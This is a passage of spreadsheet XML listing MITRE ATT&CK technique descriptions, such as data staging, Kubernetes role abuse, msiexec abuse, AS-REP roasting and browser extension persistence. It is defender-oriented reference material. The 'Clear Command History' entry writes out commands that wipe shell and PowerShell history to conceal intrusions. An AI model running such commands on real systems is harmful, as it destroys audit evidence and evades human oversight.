    <t>T1074.002</t>
  </si>
  <si>
    <t>Remote Data Staging</t>
  </si>
  <si>
    <t>Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.
https://attack.mitre.org/techniques/T1074/002</t>
  </si>
  <si>
    <t>T1098.006</t>
  </si>
  <si>
    <t>Additional Container Cluster Roles</t>
  </si>
  <si>
    <t>An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account.(Citation: Kubernetes RBAC)(Citation: Aquasec Kubernetes Attack 2023) Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions.(Citation: Kuberentes ABAC)
This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised.  
Note that where container orchestration systems are deployed in cloud environments, as with Google Kubernetes Engine, Amazon Elastic Kubernetes Service, and Azure Kubernetes Service, cloud-based  role-based access control (RBAC) assignments or ABAC policies can often be used in place of or in addition to local permission assignments.(Citation: Google Cloud Kubernetes IAM)(Citation: AWS EKS IAM Roles for Service Accounts)(Citation: Microsoft Azure Kubernetes Service Service Accounts) In these cases, this technique may be used in conjunction with [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).
https://attack.mitre.org/techniques/T1098/006</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>Scheduled Task/Job</t>
  </si>
  <si>
    <t>Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent)
https://attack.mitre.org/techniques/T1053</t>
  </si>
  <si>
    <t>T1218.007</t>
  </si>
  <si>
    <t>Msiexec</t>
  </si>
  <si>
    <t>Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the &lt;code&gt;AlwaysInstallElevated&lt;/code&gt; policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
https://attack.mitre.org/techniques/T1218/007</t>
  </si>
  <si>
    <t>T1590.003</t>
  </si>
  <si>
    <t>Network Trust Dependencies</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1590/003</t>
  </si>
  <si>
    <t>T1498.002</t>
  </si>
  <si>
    <t>Reflection Amplification</t>
  </si>
  <si>
    <t>Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018)  In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)
https://attack.mitre.org/techniques/T1498/002</t>
  </si>
  <si>
    <t>T1556.002</t>
  </si>
  <si>
    <t>Password Filter DLL</t>
  </si>
  <si>
    <t>Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. 
Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. 
Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)
https://attack.mitre.org/techniques/T1556/002</t>
  </si>
  <si>
    <t>T1505.005</t>
  </si>
  <si>
    <t>Terminal Services DLL</t>
  </si>
  <si>
    <t>Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: &lt;code&gt;svchost.exe&lt;/code&gt;) load the service's DLL file, the location of which is stored in a Registry entry named &lt;code&gt;ServiceDll&lt;/code&gt;.(Citation: Microsoft System Services Fundamentals) The &lt;code&gt;termsrv.dll&lt;/code&gt; file, typically stored in `%SystemRoot%\System32\`, is the default &lt;code&gt;ServiceDll&lt;/code&gt; value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal &lt;code&gt;termsrv.dll&lt;/code&gt; functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the &lt;code&gt;termsrv.dll&lt;/code&gt; file or modifying the &lt;code&gt;ServiceDll&lt;/code&gt; value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
https://attack.mitre.org/techniques/T1505/005</t>
  </si>
  <si>
    <t>T1059.002</t>
  </si>
  <si>
    <t>AppleScript</t>
  </si>
  <si>
    <t>Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
Scripts can be run from the command-line via &lt;code&gt;osascript /path/to/script&lt;/code&gt; or &lt;code&gt;osascript -e "script here"&lt;/code&gt;. Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding &lt;code&gt;#!/usr/bin/osascript&lt;/code&gt; to the start of the script file.(Citation: SentinelOne AppleScript)
AppleScripts do not need to call &lt;code&gt;osascript&lt;/code&gt; to execute. However, they may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s &lt;code&gt;NSAppleScript&lt;/code&gt; or &lt;code&gt;OSAScript&lt;/code&gt;, both of which execute code independent of the &lt;code&gt;/usr/bin/osascript&lt;/code&gt; command line utility.
Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team) Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)
https://attack.mitre.org/techniques/T1059/002</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t>Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.
Previous to macOS 11, adversaries could silently install browser extensions via the command line using the &lt;code&gt;profiles&lt;/code&gt; tool to install malicious &lt;code&gt;.mobileconfig&lt;/code&gt; files. In macOS 11+, the use of the &lt;code&gt;profiles&lt;/code&gt; tool can no longer install configuration profiles, however &lt;code&gt;.mobileconfig&lt;/code&gt; files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)
Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension)
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for [Command and Control](https://attack.mitre.org/tactics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for [Defense Evasion](https://attack.mitre.org/tactics/TA0005).(Citation: Browers FriarFox)(Citation: Browser Adrozek)
https://attack.mitre.org/techniques/T1176</t>
  </si>
  <si>
    <t>T1499.002</t>
  </si>
  <si>
    <t>Service Exhaustion Flood</t>
  </si>
  <si>
    <t>Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)
Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)
https://attack.mitre.org/techniques/T1499/002</t>
  </si>
  <si>
    <t>T1195.003</t>
  </si>
  <si>
    <t>Compromise Hardware Supply Chain</t>
  </si>
  <si>
    <t>Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.
https://attack.mitre.org/techniques/T1195/003</t>
  </si>
  <si>
    <t>T1106</t>
  </si>
  <si>
    <t>Native API</t>
  </si>
  <si>
    <t>Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.
Native API functions (such as &lt;code&gt;NtCreateProcess&lt;/code&gt;) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API &lt;code&gt;CreateProcess()&lt;/code&gt; or GNU &lt;code&gt;fork()&lt;/code&gt; will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
Adversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001).
https://attack.mitre.org/techniques/T1106</t>
  </si>
  <si>
    <t>T1558.005</t>
  </si>
  <si>
    <t>Ccache Files</t>
  </si>
  <si>
    <t>Adversaries may attempt to steal Kerberos tickets stored in credential cache files (or ccache). These files are used for short term storage of a user's active session credentials. The ccache file is created upon user authentication and allows for access to multiple services without the user having to re-enter credentials. 
The &lt;code&gt;/etc/krb5.conf&lt;/code&gt; configuration file and the &lt;code&gt;KRB5CCNAME&lt;/code&gt; environment variable are used to set the storage location for ccache entries. On Linux, credentials are typically stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`. On macOS, ccache entries are stored by default in memory with an `API:{uuid}` naming scheme. Typically, users interact with ticket storage using &lt;code&gt;kinit&lt;/code&gt;, which obtains a Ticket-Granting-Ticket (TGT) for the principal; &lt;code&gt;klist&lt;/code&gt;, which lists obtained tickets currently held in the credentials cache; and other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense Kerberos Linux)
Adversaries can collect tickets from ccache files stored on disk and authenticate as the current user without their password to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks. Adversaries can also use these tickets to impersonate legitimate users with elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004). Tools like Kekeo can also be used by adversaries to convert ccache files to Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008). On macOS, adversaries may use open-source tools or the Kerberos framework to interact with ccache files and extract TGTs or Service Tickets via lower-level APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
https://attack.mitre.org/techniques/T1558/005</t>
  </si>
  <si>
    <t>T1070.007</t>
  </si>
  <si>
    <t>Clear Network Connection History and Configurations</t>
  </si>
  <si>
    <t>Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.
Network connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers&lt;/code&gt;
Windows may also store information about recent RDP connections in files such as &lt;code&gt;C:\Users\\%username%\Documents\Default.rdp&lt;/code&gt; and `C:\Users\%username%\AppData\Local\Microsoft\Terminal
Server Client\Cache\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
Malicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.
https://attack.mitre.org/techniques/T1070/007</t>
  </si>
  <si>
    <t>T1558.004</t>
  </si>
  <si>
    <t>AS-REP Roasting</t>
  </si>
  <si>
    <t>Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) 
Preauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)
For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) 
An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)
Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)
https://attack.mitre.org/techniques/T1558/004</t>
  </si>
  <si>
    <t>T1584.003</t>
  </si>
  <si>
    <t>Virtual Private Server</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.
https://attack.mitre.org/techniques/T1584/003</t>
  </si>
  <si>
    <t>T1059.010</t>
  </si>
  <si>
    <t>AutoHotKey &amp; AutoIT</t>
  </si>
  <si>
    <t>Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
https://attack.mitre.org/techniques/T1059/010</t>
  </si>
  <si>
    <t>T1600.001</t>
  </si>
  <si>
    <t>Reduce Key Space</t>
  </si>
  <si>
    <t>Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.
Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)
https://attack.mitre.org/techniques/T1600/001</t>
  </si>
  <si>
    <t>T1070.003</t>
  </si>
  <si>
    <t>Clear Command History</t>
  </si>
  <si>
    <t>In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable &lt;code&gt;HISTFILE&lt;/code&gt;. When a user logs off a system, this information is flushed to a file in the user's home directory called &lt;code&gt;~/.bash_history&lt;/code&gt;. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
Adversaries may delete their commands from these logs by manually clearing the history (&lt;code&gt;history -c&lt;/code&gt;) or deleting the bash history file &lt;code&gt;rm ~/.bash_history&lt;/code&gt;.  
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (&lt;code&gt;clear logging&lt;/code&gt; and/or &lt;code&gt;clear history&lt;/code&gt;).(Citation: US-CERT-TA18-106A)
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the &lt;code&gt;PSReadLine&lt;/code&gt; module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The &lt;code&gt;PSReadLine&lt;/code&gt; command history tracks the commands used in all PowerShell sessions and writes them to a file (&lt;code&gt;$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt&lt;/code&gt; by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command &lt;code&gt;Clear-History&lt;/code&gt; to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; file. Adversaries may also delete the &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
https://attack.mitre.org/techniques/T1070/003</t>
  </si>
  <si>
    <t>T1202</t>
  </si>
  <si>
    <t>Indirect Command Execution</t>
  </si>
  <si>
    <t>Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
https://attack.mitre.org/techniques/T1202</t>
  </si>
  <si>
    <t>T1091</t>
  </si>
  <si>
    <t>Replication Through Removable Media</t>
  </si>
  <si>
    <t>Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Mobile devices may also be used to infect PCs with malware if connected via USB.(Citation: Exploiting Smartphone USB ) This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.(Citation: Windows Malware Infecting Android)(Citation: iPhone Charging Cable Hack) For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).
https://attack.mitre.org/techniques/T1091</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>Data from Local System</t>
  </si>
  <si>
    <t>Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
https://attack.mitre.org/techniques/T1005</t>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information</t>
  </si>
  <si>
    <t>Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows &lt;code&gt;copy /b&lt;/code&gt; command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)
Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)
https://attack.mitre.org/techniques/T1140</t>
  </si>
  <si>
    <t>T1137.005</t>
  </si>
  <si>
    <t>Outlook Rules</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
https://attack.mitre.org/techniques/T1137/005</t>
  </si>
  <si>
    <t>T1562</t>
  </si>
  <si>
    <t>Impair Defenses</t>
  </si>
  <si>
    <t>Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
